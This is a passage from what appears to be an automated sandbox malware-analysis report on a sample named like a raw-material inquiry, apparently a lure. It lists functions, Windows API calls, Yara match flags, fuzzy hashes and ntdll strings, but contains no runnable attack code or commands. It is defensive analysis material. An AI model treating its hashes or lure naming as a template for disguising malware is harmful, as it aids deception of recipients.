                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 00E8CB7A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                • Instruction ID: 49d974b991769118624187df44e7319b7c77229ecffb9cfcb0c53e18cde15824
                                                • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                • Instruction Fuzzy Hash: F0E04672244244BBD220EA69DC02F9BB7ACDFC5760F008559FA5CA7282C670B91187E0
                                                Function 01542B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 318 1542b60-1542b6c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 20f30e4b7cafd533dac918f6e76bb43cda8cc7ce23bf44c639bcdbcfe224c1ca
                                                • Instruction ID: c3f1ab954ab0669fce2e637d38d7f7984cb6b429c2f6d73565d12027c64adf95
                                                • Opcode Fuzzy Hash: 20f30e4b7cafd533dac918f6e76bb43cda8cc7ce23bf44c639bcdbcfe224c1ca
                                                • Instruction Fuzzy Hash: 8490026120240003424571598424616404AA7E0211B59C422F5014990DC56589916625
                                                Function 01542DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6957da4f0f4a614605283ed2a4a2e912a9db0f9ba09646c2105282a927e5f764
                                                • Instruction ID: ae7835c0abc37fb4ca6e2ae1ab23abc5050d91e321a25ad2815719b8653d95ae
                                                • Opcode Fuzzy Hash: 6957da4f0f4a614605283ed2a4a2e912a9db0f9ba09646c2105282a927e5f764
                                                • Instruction Fuzzy Hash: AD90023120140413D251715985147070049A7D0251F99C813B4424958DD6968A52A621
                                                Function 01542C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 319 1542c70-1542c7c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 60bf26d0be264ab906dcf47f1d84c6e4a2f7e74bd92d4f8cfd1af30db8c41a0d
                                                • Instruction ID: 7108b7be424c5f57785ed805eebff95032cac6fd076012b76cc38fab18b49d38
                                                • Opcode Fuzzy Hash: 60bf26d0be264ab906dcf47f1d84c6e4a2f7e74bd92d4f8cfd1af30db8c41a0d
                                                • Instruction Fuzzy Hash: A390023120148802D2507159C41474A0045A7D0311F5DC812B8424A58DC6D589917621
                                                Function 015435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6c3fe2c9becd614b6b1bc02dad9edfe37dd68ae42eca81eb55d2f2d379966ea5
                                                • Instruction ID: 9a862733508b2763e59152d80e44f63bdb7c8e0fb002ac27219981ccee086967
                                                • Opcode Fuzzy Hash: 6c3fe2c9becd614b6b1bc02dad9edfe37dd68ae42eca81eb55d2f2d379966ea5
                                                • Instruction Fuzzy Hash: 1C90023160550402D240715985247061045A7D0211F69C812B4424968DC7D58A516AA2
                                                Function 00E744C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00E7456A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 17O3k-2I$17O3k-2I
                                                • API String ID: 1836367815-2455829943
                                                • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                • Instruction ID: 8bad6e7109d61c0fa2576a2b262fbcf344f7a336b94c76be4cd36f41a57e391b
                                                • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                • Instruction Fuzzy Hash: 6B112BB2D441497ADB11DBA08C41DEE7FBCEF40358F049069F558B7141D7348E068BA0
                                                Function 00E744F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00E7456A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 17O3k-2I$17O3k-2I
                                                • API String ID: 1836367815-2455829943
                                                • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                • Instruction ID: a34b307e63f2a0fd0d9f10a606a7251643f66f1d04eb4a9c44caad895c8ad2fa
                                                • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                • Instruction Fuzzy Hash: 5E01D6B2D0024C7ADB11BBE08C82DEFBBBCEF41794F048064FA18B7141D6648E068BA1
                                                Function 00E8CEB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 41 e8ceb3-e8cef4 call e64903 call e8dd73 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 00E8CEEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: i
                                                • API String ID: 3298025750-1498560215
                                                • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                • Instruction ID: 99d98ff87134d3b9b8078d55b6d1d8c949d0a6c9c3f13633deeb06e0d1f0da94
                                                • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                • Instruction Fuzzy Hash: ADE06DB2604204BBD610EE58EC41F9F37ACEFC8750F004008F918A7282C771B9118BB4
                                                Function 00E8CE63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 299 e8ce63-e8cea7 call e64903 call e8dd73 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,00E7EA4E,?,?,00000000,?,00E7EA4E,?,?,?), ref: 00E8CEA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                • Instruction ID: bb9a80a83a40450a28248df32321600a1fcc3f17a7d6c3b0d4a760d249ecf074
                                                • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                • Instruction Fuzzy Hash: 51E06DB2254244BBD614EE58DC42EAB77ACEFC8710F004049FA0CA7282C770B91087B4
                                                Function 00E8CF03 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 309 e8cf03-e8cf38 call e64903 call e8dd73 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 00E8CF33
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                • Associated: 00000000.00000002.1663592834.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1663645148.0000000000EA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e60000_CSZ inquiry for MH raw material.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                • Instruction ID: c87f77afdc621b9b73db4e42ff1e2c9762ee25c857808fc8f2c880c42b6e8677
                                                • Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                • Instruction Fuzzy Hash: F6E08C722406147BC220FA59EC01F9B77ACDFC5760F108099FA0CA7286D6B0B9108BF4
                                                Function 01542C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 314 1542c0a-1542c0f 315 1542c11-1542c18 314->315 316 1542c1f-1542c26 LdrInitializeThunk 314->316
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d0afdb8c79e26f09b5ade5db45a7ef7a09732c34f66b12b3cf07f947c66754e8
                                                • Instruction ID: ee161e0a19588cc4218815fdf9027514e25112931c4ada40987799a252a33b72
                                                • Opcode Fuzzy Hash: d0afdb8c79e26f09b5ade5db45a7ef7a09732c34f66b12b3cf07f947c66754e8
                                                • Instruction Fuzzy Hash: 66B09B719015D5D6DB51E765960871B794077D0715F19C462F2030A41F4778C1D1E675

                                                Non-executed Functions

                                                Function 01582349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 32ff4db322d93a9e20bc2e1bd44b66eca30e32f8db51c2373d270ee01b3c6d5f
                                                • Instruction ID: 5a8dfbf41ccc595c0b8f08617180b114c57483327efd21739ac4049b39385c11
                                                • Opcode Fuzzy Hash: 32ff4db322d93a9e20bc2e1bd44b66eca30e32f8db51c2373d270ee01b3c6d5f
                                                • Instruction Fuzzy Hash: 5A928171608742AFE721EF19C840B6BBBE8BF84754F04491DFA95EB290D770E845CB92
                                                Function 014F68B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-3089669407
                                                • Opcode ID: a5efb047284114699228e1fb703c3818deca84a5d00a37ffbaebe74702176aff
                                                • Instruction ID: 341b5b38adf29099abd8d53176634371f583929e5de7d7bdb84700803ef57b60
                                                • Opcode Fuzzy Hash: a5efb047284114699228e1fb703c3818deca84a5d00a37ffbaebe74702176aff
                                                • Instruction Fuzzy Hash: 478175B2D12619BF9B11EBD4DDD4EDE77BDAB14714716042BBA10FB110E630DE089BA0
                                                Function 015A5910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                Download Yara Rule
                                                Strings
                                                • PreferredUILanguages, xrefs: 015A63D1
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 015A5A84
                                                • LanguageConfiguration, xrefs: 015A6420
                                                • @, xrefs: 015A6277
                                                • PreferredUILanguagesPending, xrefs: 015A61D2
                                                • @, xrefs: 015A6027
                                                • LanguageConfigurationPending, xrefs: 015A6221
                                                • InstallLanguageFallback, xrefs: 015A6050
                                                • @, xrefs: 015A647A
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015A635D
                                                • @, xrefs: 015A63A0
                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 015A5FE1
                                                • Control Panel\Desktop, xrefs: 015A615E
                                                • @, xrefs: 015A61B0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                • API String ID: 0-1325123933
                                                • Opcode ID: a20662df35c1776b29e990cc004c399f32b7662c9f8f7a2cd00f8a400fe98d9b
                                                • Instruction ID: 92652317e06a6436740ff66b0027bb9de31356c5c73a0b6957046de2471d773c
                                                • Opcode Fuzzy Hash: a20662df35c1776b29e990cc004c399f32b7662c9f8f7a2cd00f8a400fe98d9b
                                                • Instruction Fuzzy Hash: D37248715583429FD721DF28C850A6FBBE9FBC8704F84492DFA859B250E770D905CBA2
                                                Function 01538620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                Download Yara Rule
                                                Strings
                                                • 8, xrefs: 015752E3
                                                • Critical section address., xrefs: 01575502
                                                • undeleted critical section in freed memory, xrefs: 0157542B
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0157540A, 01575496, 01575519
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015754CE
                                                • Invalid debug info address of this critical section, xrefs: 015754B6
                                                • Critical section address, xrefs: 01575425, 015754BC, 01575534
                                                • Critical section debug info address, xrefs: 0157541F, 0157552E
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01575543
                                                • Thread identifier, xrefs: 0157553A
                                                • Address of the debug info found in the active list., xrefs: 015754AE, 015754FA
                                                • double initialized or corrupted critical section, xrefs: 01575508
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015754E2
                                                • corrupted critical section, xrefs: 015754C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: 81e4c570c5dcadbc1737c544cab22534a73b78efc856fc9258f3f0aa529df355
                                                • Instruction ID: 87440633e8317efde9384203e2b18e5c817e71e76020c61e1f29df8975873ca2
                                                • Opcode Fuzzy Hash: 81e4c570c5dcadbc1737c544cab22534a73b78efc856fc9258f3f0aa529df355
                                                • Instruction Fuzzy Hash: B8818C71A40359AFDF21CF99D845BAEBBF5FB48704F24411AF504BB2A0E371A945CB60
                                                Function 015329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                Download Yara Rule
                                                Strings
                                                • @, xrefs: 0157259B
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01572409
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01572498
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015724C0
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01572412
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015725EB
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01572624
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015722E4
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01572602
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0157261F
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01572506
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: 9fb4ba076338c803207f8b7491befdef86e684955487188b33196921f2c19e8d
                                                • Instruction ID: 8dc255e018b73cb9a489d354d78d4d881028f69aee24a58b9116becd79dcf917
                                                • Opcode Fuzzy Hash: 9fb4ba076338c803207f8b7491befdef86e684955487188b33196921f2c19e8d
                                                • Instruction Fuzzy Hash: C10260F1D00629AFDB21DB54DC81B9DB7B8BF94314F4045DAA609AB241EB309F84CF69
                                                Function 01530F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                • API String ID: 0-360209818
                                                • Opcode ID: 720b02705db1051bd30fe752f34a468aee0772c79626319623c64830cf4a63d4
                                                • Instruction ID: aee5849904340250054ee1095ee635a92b489a4b4b0c105485d27118988f6cc6
                                                • Opcode Fuzzy Hash: 720b02705db1051bd30fe752f34a468aee0772c79626319623c64830cf4a63d4
                                                • Instruction Fuzzy Hash: 4F629EB1A006298FDB24CF19D8827ADBBB6BFD5310F5482DAD549AF240D7325AE1CF50
                                                Function 015A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: d8e35c8027d3813c532b201a36160d8799eed86a296d50f846471db2de93e0e5
                                                • Instruction ID: 23d12a002d204485f1231d2b16ede017f0688bb2583fd4de6101162a7e18cfaf
                                                • Opcode Fuzzy Hash: d8e35c8027d3813c532b201a36160d8799eed86a296d50f846471db2de93e0e5
                                                • Instruction Fuzzy Hash: CE51E0711443129BD725DF18C854BAFBBE8FF94245F94491EB958CB250E770D604CBD2
                                                Function 015B12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 76201acc89686c2df86749c2a936ca54120e189f93aef4b5f502db82e6abb72b
                                                • Instruction ID: 6d7453e8c71ce0b7e0a74c28e8f21dccd48fa05f408a040313e193a9eb4ef6b3
                                                • Opcode Fuzzy Hash: 76201acc89686c2df86749c2a936ca54120e189f93aef4b5f502db82e6abb72b
                                                • Instruction Fuzzy Hash: E6128B30600A42DFDB658F29D4E5BBABBF1FF19614F18885EE5868F691D734E880CB50
                                                Function 0151AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-3197712848
                                                • Opcode ID: ba8f7daa57a8874226572cabaaec2f72d580fed8a6d162ef0d6dd1d34f4c3dd6
                                                • Instruction ID: 3bd7f7f63fe2307d9fd65cc61937925272369acb2ced526c8b2a5c798861bdd6
                                                • Opcode Fuzzy Hash: ba8f7daa57a8874226572cabaaec2f72d580fed8a6d162ef0d6dd1d34f4c3dd6
                                                • Instruction Fuzzy Hash: AB12F0716093828FE326DF28C880BAAB7E4FF84714F05491EF9958F295E774D944CB92
                                                Function 014FD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                • API String ID: 0-3532704233
                                                • Opcode ID: a4f7c37213c2ac0978c6d024bffafff3a0c19a66a8fa56fcb9e0f11604491afe
                                                • Instruction ID: c392cb1f113d2a007d2637a31abd8b6f1484553d1ca6e7d2ac36f557f585a238
                                                • Opcode Fuzzy Hash: a4f7c37213c2ac0978c6d024bffafff3a0c19a66a8fa56fcb9e0f11604491afe
